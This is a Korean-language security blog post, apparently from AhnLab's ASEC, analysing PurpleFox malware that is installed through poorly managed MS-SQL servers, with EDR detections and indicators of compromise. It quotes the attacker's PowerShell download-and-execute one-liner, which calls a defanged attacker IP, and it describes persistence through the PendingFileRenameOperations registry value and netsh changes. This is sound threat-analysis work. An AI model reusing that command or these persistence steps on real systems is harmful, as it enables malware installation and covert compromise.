MS-SQL 서버로 유포되는 PurpleFox

MS-SQL 서버로 유포되는 PurpleFox

MS-SQL 서버로 유포되는 PurpleFox - ASEC BLOG

AhnLab Security Emergency response Center(ASEC)은 ASD(AhnLab Smart Defense) 인프라를 통해 최근 부적절하게 관리되고 있는 MS-SQL 서버를 대상으로 PurpleFox 악성코드가 설치되고 있는 것을 확인하였다. PurpleFox 악성코드는 추가 악성코드를 다운로드하는 로더 역할을 수행하며 주로 코인 마이너 악성코드를 설치한다고 알려져있다. 악성코드의 기능에 자신을 엄폐하는 루트킷 기능도 포함되어 있어 각별한 주의가 필요하다.

이번에 확인된 PurpleFox 악성코드의 초기 침투 방식은 부적절하게 관리되고 있는 MS-SQL 서버를 대상으로 공격이 이루어졌다. 공격자는 아래 [그림 1]과 같이 MS-SQL 서버 관련 프로세스인 sqlservr.exe를 통해 파워쉘을 실행하였다.

[그림 1] MS-SQL 서버 프로세스(sqlservr.exe)에 의해 실행되는 파워쉘 명령

• 파워쉘 명령 : powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp://64.227.152[.]193:18336/57BC9B7E.Png’);MsiMake hxxp://64.227.152[.]193:18336/2E0ECB2F.Png”

위 파워쉘 명령이 실행되면 “hxxp://64.227.152[.]193:18336/57BC9B7E.Png” 주소로 부터 난독화된 파워쉘을 다운로드 및 로드 한다. 다운로드된 파워쉘은 아래 [그림 2]와 같이 공격자가 제작한 함수인 MsiMake를 포함하고 있다. 이후 “hxxp://64.227.152[.]193:18336/2E0ECB2F.Png” 주소에서 MSI 파일을 다운로드 받아 시스템에 MsiMake 명령을 실행하여 MSI 파일을 설치 한다.

• 57BC9B7E.Png : 난독화 파워쉘
• 2E0ECB2F.Png : PurpleFox (MSI 파일)

[그림 2] 파워쉘 복호화 코드

57BC9B7E.Png 파일은 MSI 파일 설치 기능 이외에도 스크립트 내부에 권한 상승을 위한 취약점 실행 파일 및 파워쉘 스크립트(Invoke-Tater)와 이를 파일리스 형태로 실행하기 위한 파워쉘 스크립트 (Invoke-ReflectivePEInjection)을 포함하고 있다. 결과적으로 공격자는 57BC9B7E.Png 파워쉘 코드를 통해 사용자 개입 없이 악성 MSI 파일을 관리자 권한으로 설치할 수 있게 된다.

MSI 파일은 PurpleFox 악성코드를 서비스 권한 실행 및 지속성 유지를 위해 레지스트리 키 변경을 수행한다. 안랩 EDR(Endpoint Detection & Response)에서는 PurpleFox 악성코드의 초기 침투 단계(파워쉘을 이용한 MSI 파일 설치)와 권한 상승 및 지속성 유지 단계를 탐지하고 있으며 EDR 제품을 운영중인 보안 담당자는 탐지 로그를 기반으로 악성코드 유포지 차단 등 공격자의 위협을 능동적으로 차단할 수 있다.

[1] 초기 침투(Initial Access) & 실행 (Execution)

공격자는 부적절하게 관리되는 MS-SQL 서버에 접근하여 sqlservr.exe 프로세스를 통해 파워쉘을 실행하였다. 안랩 EDR에서는 공격자가 사용하는 의심스러운 파워쉘 명령에 대해 “Execution/MDP.Powershell.M10668” 진단명으로 탐지하고 있다.

[그림 3] sqlservr.exe 프로세스에 의한 파워쉘 실행 행위 탐지 화면

[2] 지속성 유지(Persistence) & 권한 상승(Privilege Escalation)

난독화된 파워쉘이 실행되면 MSI 파일 설치를 수행한다. MSI 패키지 파일은 지속성 유지 및 권한 상승을 위한 레지스트리 키 변경을 수행하는데 공격자가 변조하는 레지스트리 키는 “HKLM\SYSTEM\CurrentControlSet\Control\Session Manager”키의 PendingFileRenameOperations 값이다.

[그림 4] 레지스트리 키 설정 행위 탐지 화면

해당 기법을 이용하면 특정 파일의 삭제 및 이름 변경을 위한 예약 작업을 수행할 수 있다. 즉, 공격자는 이 기법을 사용하여 악성코드(setupact64.log)를 정상 파일명(sens.dll)로 변경하여 시스템 재부팅 이후 서비스로 동작하게 한다.
* sens.dll은 NetWork 서비스 그룹에서 사용하는 정상 DLL 파일명이다.

[그림 5] netsvc 그룹 목록

이외에도 MSI 패키지는 netsh 유틸리티를 이용해 특정 포트에 관한 IPsec 정책을 추가한다. 해당 포트는 네트워크 상에서 시스템 간의 자원 공유를 위한 포트 (135-RPC, 139-NetBIOS, 445-CIFS/SMB) 로서 악성코드가 네트워크 접속 시 이용하는 대표적인 (취약한) 포트이다.

[그림 6] 네트워크 설정 변경 행위 탐지 화면

[그림 7] netsh.exe 프로세스 실행 다이어그램 화면

레지스트리 키 변경 및 포트 정책을 추가하면 MSI 패키지는 재부팅을 시도한다. 재부팅 이후에는 SENS 서비스(시스템 이벤트 알림 서비스)가 실행되면서 악성코드가 동작하고 실행된 악성코드는 루트킷 실행 및 안전모드에서의 동작을 위해 추가적인 서비스 등록 작업을 수행한다.

[그림 8] 루트킷 및 안전 모드 실행을 위한 서비스 등록 행위 탐지 화면

[3] 결론

EDR 제품을 운영하는 보안 담당자는 이처럼 초기 침투 단계부터 지속성 유지 및 권한 상승까지 공격자가 사용한 기법을 EDR을 통해 확인할 수 있다. 특히 공격자가 기업 내에 어떻게 침입하였는지에 대해 알 수 있으므로 이를 바탕으로 기업 내부의 취약한 시스템을 보완하고 더 나아가 공격자의 위협에 대해 능동적으로 대응할 수 있다.

[IoC]
[MD5]
f725bab929df4fe2626849ba269b7fcb // MSI 패키지
d88a9237dd21653ebb155b035aa9a33c // 난독화된 파워쉘

[URL]
hxxp://64.227.152[.]193:18336/57BC9B7E.Png
hxxp://64.227.152[.]193:18336/2E0ECB2F.Png

[파일 진단]
Dropper/MSI.Purplefox (2023.06.27.02)
Trojan/Powershell.Inject (2023.07.12.02)

[행위 진단]
Execution/MDP.Powershell.M2514
Execution/MDP.Powershell.M10668

행위 정보 탐지 및 분석을 통한 엔드포인트 가시성을 제공하고 위협을 능동적으로 추적하는 AhnLab EDR에 대한 자세한 정보는 안랩닷컴에서 확인이 가능하다.

MS-SQL 서버로 유포되는 PurpleFox

MS-SQL 서버로 유포되는 PurpleFox - ASEC BLOG